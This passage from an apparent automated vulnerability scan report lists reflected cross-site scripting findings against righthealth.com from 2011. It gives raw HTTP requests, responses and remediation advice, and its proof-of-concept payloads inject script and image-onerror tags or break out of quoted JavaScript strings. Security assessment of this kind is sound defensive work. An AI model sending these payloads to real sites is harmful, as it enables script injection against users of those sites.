Cookie: kid=ffeeb640-615b-012e-af22-003048fe49ee; as=ref_absent; KC=K; last_referrer=; __utmz=168930850.1305489674.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=168930850.799214937.1305489674.1305489674.1305489674.1; __utmc=168930850; __utmb=168930850.1.10.1305489674; __qca=P0-481111707-1305489677084; NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:12:02 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=K; path=/
Set-Cookie: iq=images; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:12:02 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992;expires=Sun, 15-May-2011 20:27:02 GMT;path=/
Content-Length: 20573

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<meta name="title" content="Health favicon.ico37928"><img src=a onerror=alert(1)>5d6aa7d5381" />
...[SNIP]...

4.47. http://www.righthealth.com/javascripts/cache/options_bottom-righthealth-sem-chimborazo-153574.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.righthealth.com
Path:   /javascripts/cache/options_bottom-righthealth-sem-chimborazo-153574.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f07a1"><img%20src%3da%20onerror%3dalert(1)>753635fa670 was submitted in the REST URL parameter 2. This input was echoed as f07a1"><img src=a onerror=alert(1)>753635fa670 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /javascripts/f07a1"><img%20src%3da%20onerror%3dalert(1)>753635fa670/options_bottom-righthealth-sem-chimborazo-153574.js?1305315777 HTTP/1.1
Host: www.righthealth.com
Proxy-Connection: keep-alive
Referer: http://www.righthealth.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=ffeeb640-615b-012e-af22-003048fe49ee; as=ref_absent; KC=K; NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992; last_referrer=

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:07:26 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=K; path=/
Set-Cookie: iq=javascripts; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:07:26 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992;expires=Sun, 15-May-2011 20:22:26 GMT;path=/
Content-Length: 21139

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<meta name="title" content="F07a1"><img Src=a Onerror=alert(1)>753635fa670 options_bottom righthealth sem chimborazo 153574.js" />
...[SNIP]...

4.48. http://www.righthealth.com/javascripts/cache/options_bottom-righthealth-sem-chimborazo-153574.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.righthealth.com
Path:   /javascripts/cache/options_bottom-righthealth-sem-chimborazo-153574.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1142\"%3b76e560c0324 was submitted in the REST URL parameter 2. This input was echoed as e1142\\";76e560c0324 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /javascripts/e1142\"%3b76e560c0324/options_bottom-righthealth-sem-chimborazo-153574.js?1305315777 HTTP/1.1
Host: www.righthealth.com
Proxy-Connection: keep-alive
Referer: http://www.righthealth.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=ffeeb640-615b-012e-af22-003048fe49ee; as=ref_absent; KC=K; NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992; last_referrer=

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:07:29 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=K; path=/
Set-Cookie: iq=javascripts; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:07:29 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992;expires=Sun, 15-May-2011 20:22:29 GMT;path=/
Content-Length: 20855

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<script type="text/javascript">
   var kl = kapp.log;
   window.document.kl = kl;
   kl.session_name = "kid";
   kl.session_id = "ffeeb640-615b-012e-af22-003048fe49ee";
   kl.svid = "1574392605";
   kl.query = "E1142\\";76e560c0324";
   kl.source = kapp.traffic.source();
   kl.subsource = kapp.traffic.subSource();
   kl.coordinate_anchor_id = "header";
   kl.http_referrer = "http://www.righthealth.com/";
   kl.build_id = '153574';
   kl.rel
...[SNIP]...

4.49. http://www.righthealth.com/javascripts/cache/topic_bottom-righthealth-sem-chimborazo-153574.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.righthealth.com
Path:   /javascripts/cache/topic_bottom-righthealth-sem-chimborazo-153574.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dcab7"><script>alert(1)</script>37d1f3bab78 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /javascriptsdcab7"><script>alert(1)</script>37d1f3bab78/cache/topic_bottom-righthealth-sem-chimborazo-153574.js?1305315777 HTTP/1.1
Host: www.righthealth.com
Proxy-Connection: keep-alive
Referer: http://www.righthealth.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=ffeeb640-615b-012e-af22-003048fe49ee; as=ref_absent; KC=K; NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992; last_referrer=

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:07:58 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=K; path=/
Set-Cookie: iq=javascriptsdcab7%22%3E%3Cscript%3Ealert%281%29%3C; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:07:58 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992;expires=Sun, 15-May-2011 20:22:58 GMT;path=/
Content-Length: 20845

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<link rel="canonical" href="http://www.righthealth.com/javascriptsdcab7"><script>alert(1)</script>37d1f3bab78/cache/topic_bottom-righthealth-sem-chimborazo-153574.js"/>
...[SNIP]...

4.50. http://www.righthealth.com/javascripts/cache/topic_bottom-righthealth-sem-chimborazo-153574.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.righthealth.com
Path:   /javascripts/cache/topic_bottom-righthealth-sem-chimborazo-153574.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3e12"><img%20src%3da%20onerror%3dalert(1)>9506abee47d was submitted in the REST URL parameter 2. This input was echoed as b3e12"><img src=a onerror=alert(1)>9506abee47d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /javascripts/b3e12"><img%20src%3da%20onerror%3dalert(1)>9506abee47d/topic_bottom-righthealth-sem-chimborazo-153574.js?1305315777 HTTP/1.1
Host: www.righthealth.com
Proxy-Connection: keep-alive
Referer: http://www.righthealth.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=ffeeb640-615b-012e-af22-003048fe49ee; as=ref_absent; KC=K; NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992; last_referrer=

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:08:27 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=K; path=/
Set-Cookie: iq=javascripts; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:08:27 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992;expires=Sun, 15-May-2011 20:23:27 GMT;path=/
Content-Length: 21124

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<meta name="title" content="B3e12"><img Src=a Onerror=alert(1)>9506abee47d topic_bottom righthealth sem chimborazo 153574.js" />
...[SNIP]...

4.51. http://www.righthealth.com/javascripts/cache/topic_bottom-righthealth-sem-chimborazo-153574.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.righthealth.com
Path:   /javascripts/cache/topic_bottom-righthealth-sem-chimborazo-153574.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 794a0\"%3b7d773a0b224 was submitted in the REST URL parameter 2. This input was echoed as 794a0\\";7d773a0b224 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /javascripts/794a0\"%3b7d773a0b224/topic_bottom-righthealth-sem-chimborazo-153574.js?1305315777 HTTP/1.1
Host: www.righthealth.com
Proxy-Connection: keep-alive
Referer: http://www.righthealth.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=ffeeb640-615b-012e-af22-003048fe49ee; as=ref_absent; KC=K; NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992; last_referrer=

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:08:29 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=K; path=/
Set-Cookie: iq=javascripts; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:08:29 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992;expires=Sun, 15-May-2011 20:23:29 GMT;path=/
Content-Length: 20840

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<script type="text/javascript">
   var kl = kapp.log;
   window.document.kl = kl;
   kl.session_name = "kid";
   kl.session_id = "ffeeb640-615b-012e-af22-003048fe49ee";
   kl.svid = "749663975";
   kl.query = "794a0\\";7d773a0b224";
   kl.source = kapp.traffic.source();
   kl.subsource = kapp.traffic.subSource();
   kl.coordinate_anchor_id = "header";
   kl.http_referrer = "http://www.righthealth.com/";
   kl.build_id = '153574';
   kl.rel
...[SNIP]...

4.52. http://www.righthealth.com/javascripts/cache/topic_bottom_homepage-righthealth-sem-chimborazo-153574.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.righthealth.com
Path:   /javascripts/cache/topic_bottom_homepage-righthealth-sem-chimborazo-153574.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8987"><img%20src%3da%20onerror%3dalert(1)>3eae1b6f947 was submitted in the REST URL parameter 2. This input was echoed as f8987"><img src=a onerror=alert(1)>3eae1b6f947 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /javascripts/f8987"><img%20src%3da%20onerror%3dalert(1)>3eae1b6f947/topic_bottom_homepage-righthealth-sem-chimborazo-153574.js?1305315846 HTTP/1.1
Host: www.righthealth.com
Proxy-Connection: keep-alive
Referer: http://www.righthealth.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=ffeeb640-615b-012e-af22-003048fe49ee; as=ref_absent; KC=K; NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992; last_referrer=

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:07:03 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=K; path=/
Set-Cookie: iq=javascripts; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:07:03 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992;expires=Sun, 15-May-2011 20:22:03 GMT;path=/
Content-Length: 21188

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<meta name="title" content="F8987"><img Src=a Onerror=alert(1)>3eae1b6f947 topic_bottom_homepage righthealth sem chimborazo 153574.js" />
...[SNIP]...

4.53. http://www.righthealth.com/javascripts/cache/topic_bottom_homepage-righthealth-sem-chimborazo-153574.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.righthealth.com
Path:   /javascripts/cache/topic_bottom_homepage-righthealth-sem-chimborazo-153574.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51863\"%3b251d366298 was submitted in the REST URL parameter 2. This input was echoed as 51863\\";251d366298 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /javascripts/51863\"%3b251d366298/topic_bottom_homepage-righthealth-sem-chimborazo-153574.js?1305315846 HTTP/1.1
Host: www.righthealth.com
Proxy-Connection: keep-alive
Referer: http://www.righthealth.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=ffeeb640-615b-012e-af22-003048fe49ee; as=ref_absent; KC=K; NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992; last_referrer=

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:07:05 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=K; path=/
Set-Cookie: iq=javascripts; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:07:05 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992;expires=Sun, 15-May-2011 20:22:05 GMT;path=/
Content-Length: 20895

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<script type="text/javascript">
   var kl = kapp.log;
   window.document.kl = kl;
   kl.session_name = "kid";
   kl.session_id = "ffeeb640-615b-012e-af22-003048fe49ee";
   kl.svid = "1466212046";
   kl.query = "51863\\";251d366298";
   kl.source = kapp.traffic.source();
   kl.subsource = kapp.traffic.subSource();
   kl.coordinate_anchor_id = "header";
   kl.http_referrer = "http://www.righthealth.com/";
   kl.build_id = '153574';
   kl.rel
...[SNIP]...

4.54. http://www.righthealth.com/javascripts/cache/topic_top-s_righthealth-chimborazo-153574.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.righthealth.com
Path:   /javascripts/cache/topic_top-s_righthealth-chimborazo-153574.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e560\"%3b94424d31d72 was submitted in the REST URL parameter 2. This input was echoed as 6e560\\";94424d31d72 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /javascripts/6e560\"%3b94424d31d72/topic_top-s_righthealth-chimborazo-153574.js?1305315776 HTTP/1.1
Host: www.righthealth.com
Proxy-Connection: keep-alive
Referer: http://www.righthealth.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=ffeeb640-615b-012e-af22-003048fe49ee; as=ref_absent; KC=K; NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:07:07 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=K; path=/
Set-Cookie: iq=javascripts; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:07:07 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992;expires=Sun, 15-May-2011 20:22:07 GMT;path=/
Content-Length: 20806

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<script type="text/javascript">
   var kl = kapp.log;
   window.document.kl = kl;
   kl.session_name = "kid";
   kl.session_id = "ffeeb640-615b-012e-af22-003048fe49ee";
   kl.svid = "1761041272";
   kl.query = "6e560\\";94424d31d72";
   kl.source = kapp.traffic.source();
   kl.subsource = kapp.traffic.subSource();
   kl.coordinate_anchor_id = "header";
   kl.http_referrer = "http://www.righthealth.com/";
   kl.build_id = '153574';
   kl.rel
...[SNIP]...

4.55. http://www.righthealth.com/javascripts/cache/topic_top-s_righthealth-chimborazo-153574.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.righthealth.com
Path:   /javascripts/cache/topic_top-s_righthealth-chimborazo-153574.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd5c2"><img%20src%3da%20onerror%3dalert(1)>8d285d61078 was submitted in the REST URL parameter 2. This input was echoed as dd5c2"><img src=a onerror=alert(1)>8d285d61078 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /javascripts/dd5c2"><img%20src%3da%20onerror%3dalert(1)>8d285d61078/topic_top-s_righthealth-chimborazo-153574.js?1305315776 HTTP/1.1
Host: www.righthealth.com
Proxy-Connection: keep-alive
Referer: http://www.righthealth.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=ffeeb640-615b-012e-af22-003048fe49ee; as=ref_absent; KC=K; NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:07:05 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=K; path=/
Set-Cookie: iq=javascripts; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:07:05 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992;expires=Sun, 15-May-2011 20:22:05 GMT;path=/
Content-Length: 21090

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<meta name="title" content="Dd5c2"><img Src=a Onerror=alert(1)>8d285d61078 topic_top s_righthealth chimborazo 153574.js" />
...[SNIP]...

4.56. http://www.righthealth.com/stylesheets/cache/topic-s_righthealth-chimborazo-153574.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.righthealth.com
Path:   /stylesheets/cache/topic-s_righthealth-chimborazo-153574.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8fd0"><img%20src%3da%20onerror%3dalert(1)>9308dcd9410 was submitted in the REST URL parameter 2. This input was echoed as b8fd0"><img src=a onerror=alert(1)>9308dcd9410 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /stylesheets/b8fd0"><img%20src%3da%20onerror%3dalert(1)>9308dcd9410/topic-s_righthealth-chimborazo-153574.css?1305489648 HTTP/1.1
Host: www.righthealth.com
Proxy-Connection: keep-alive
Referer: http://www.righthealth.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=ffeeb640-615b-012e-af22-003048fe49ee; as=ref_absent; KC=K; NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:07:19 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=K; path=/
Set-Cookie: iq=stylesheets; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:07:19 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992;expires=Sun, 15-May-2011 20:22:19 GMT;path=/
Content-Length: 21068

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<meta name="title" content="B8fd0"><img Src=a Onerror=alert(1)>9308dcd9410 topic s_righthealth chimborazo 153574.css" />
...[SNIP]...

4.57. http://www.righthealth.com/stylesheets/cache/topic-s_righthealth-chimborazo-153574.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.righthealth.com
Path:   /stylesheets/cache/topic-s_righthealth-chimborazo-153574.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b869f\"%3bff4d86bda9a was submitted in the REST URL parameter 2. This input was echoed as b869f\\";ff4d86bda9a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

